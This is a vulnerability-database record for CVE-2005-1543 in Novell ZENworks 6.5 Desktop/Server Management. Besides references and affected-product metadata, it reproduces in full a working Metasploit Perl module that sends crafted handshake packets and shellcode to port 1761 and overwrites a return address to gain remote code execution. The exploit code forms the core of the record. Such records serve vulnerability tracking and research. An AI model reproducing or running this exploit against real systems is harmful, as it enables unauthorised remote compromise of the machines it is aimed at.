ID

VAR-E-200505-0074


CVE

cve_id:CVE-2005-1543

Trust: 2.4

sources: BID: 13678 // PACKETSTORM: 83038 // EXPLOIT-DB: 1150 // EDBNET: 25621

EDB ID

1150


TITLE

Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 1150

DESCRIPTION

Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit). CVE-16698CVE-2005-1543 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 1150

AFFECTED PRODUCTS

vendor:novellmodel:zenworksscope:eqversion:6.5

Trust: 1.0

vendor:novellmodel:zenworks desktop/server managementscope:eqversion:6.5

Trust: 0.5

vendor:novellmodel:zenworks server managementscope:eqversion:6.5

Trust: 0.3

vendor:novellmodel:zenworks remote managementscope: - version: -

Trust: 0.3

vendor:novellmodel:zenworks for serversscope:eqversion:3.2

Trust: 0.3

vendor:novellmodel:zenworks for desktopsscope:eqversion:4.0.1

Trust: 0.3

vendor:novellmodel:zenworks for desktopsscope:eqversion:4.0

Trust: 0.3

vendor:novellmodel:zenworks for desktops sp2scope:eqversion:3.2

Trust: 0.3

vendor:novellmodel:zenworks desktop managementscope:eqversion:6.5

Trust: 0.3

sources: BID: 13678 // PACKETSTORM: 83038 // EXPLOIT-DB: 1150

EXPLOIT

#
#

package Msf::Exploit::zenworks_desktop_agent;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'Anonymous',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],
'Priv' => 1,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 1761 ],
},

'Payload' =>
{
'Space' => 0x7FFF,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a heap overflow in the Novell ZENworks
Desktop Management agent.
}),

'Refs' =>
[
['BID', 13678],
],

'Targets' =>
[
[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]
],

'Keys' => ['zenworks'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);

if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}

my $req = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77";
$self->PrintLine( "[*] Sending version identication" );
$s->Send($req);

my $ident = $s->Recv(-1, 16);
if (length($ident) != 16)
{
$self->PrintLine( "[*] Failed to receive agent version identication" );
return;
}
else
{
$self->PrintLine( "[*] Received agent version identication" );
}

$req = "\x00\x01";
$self->PrintLine( "[*] Sending client acknowledgment" );
$s->Send($req);

# stack overflow in ZenRem32.exe / ZENworks Server Management

$req = "\x00\x06metmet\x00\x06metmet\x7F\xFF" . $shellcode . "\x00\x01";
$self->PrintLine( "[*] Sending authentication data (including shellcode)" );
$s->Send($req);

$s->Recv(2, 2);
$s->Send("\x00\x01");

#$s->Recv(2, 2);
#my $len = $s->Recv(2,2);
#$len = unpack ('n', $len);
#$s->Recv($len, $len);

$s->Send("\x00\x02");

$self->PrintLine( "[*] Sending final payload" );

# pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode
my $crash = "A" x 0x20;
$req = "\x00\x24" . $crash . pack('V', $target->[1]);
$s->Send($req);

$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
select(undef, undef, undef, 4);

$self->Handler($s);
return;
}

1;

# milw0rm.com [2005-08-12]

Trust: 1.0

sources: EXPLOIT-DB: 1150

EXPLOIT LANGUAGE

pm

Trust: 0.6

sources: EXPLOIT-DB: 1150

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 1150

TYPE

Desktop/Server Management Remote Stack Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 1150

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 83038 // EXPLOIT-DB: 1150

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 1150

EXTERNAL IDS

db:NVDid:CVE-2005-1543

Trust: 2.4

db:EXPLOIT-DBid:1150

Trust: 1.6

db:EDBNETid:25621

Trust: 0.6

db:PACKETSTORMid:83038

Trust: 0.5

db:BIDid:13678

Trust: 0.3

sources: BID: 13678 // PACKETSTORM: 83038 // EXPLOIT-DB: 1150 // EDBNET: 25621

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2005-1543

Trust: 2.1

url:https://www.exploit-db.com/exploits/1150/

Trust: 0.6

url:http://support.novell.com/cgi-bin/search/searchtid.cgi?/10097644.htm

Trust: 0.3

url:http://support.novell.com/cgi-bin/search/searchtid.cgi?/2971493.htm

Trust: 0.3

url:http://www.rem0te.com/public/images/zen.pdf

Trust: 0.3

sources: BID: 13678 // PACKETSTORM: 83038 // EXPLOIT-DB: 1150 // EDBNET: 25621

SOURCES

db:BIDid:13678
db:PACKETSTORMid:83038
db:EXPLOIT-DBid:1150
db:EDBNETid:25621

LAST UPDATE DATE

2022-07-27T09:23:34.916000+00:00


SOURCES UPDATE DATE

db:BIDid:13678date:2009-07-12T14:56:00

SOURCES RELEASE DATE

db:BIDid:13678date:2005-05-18T00:00:00
db:PACKETSTORMid:83038date:2009-11-26T00:34:53
db:EXPLOIT-DBid:1150date:2005-08-12T00:00:00
db:EDBNETid:25621date:2005-08-12T00:00:00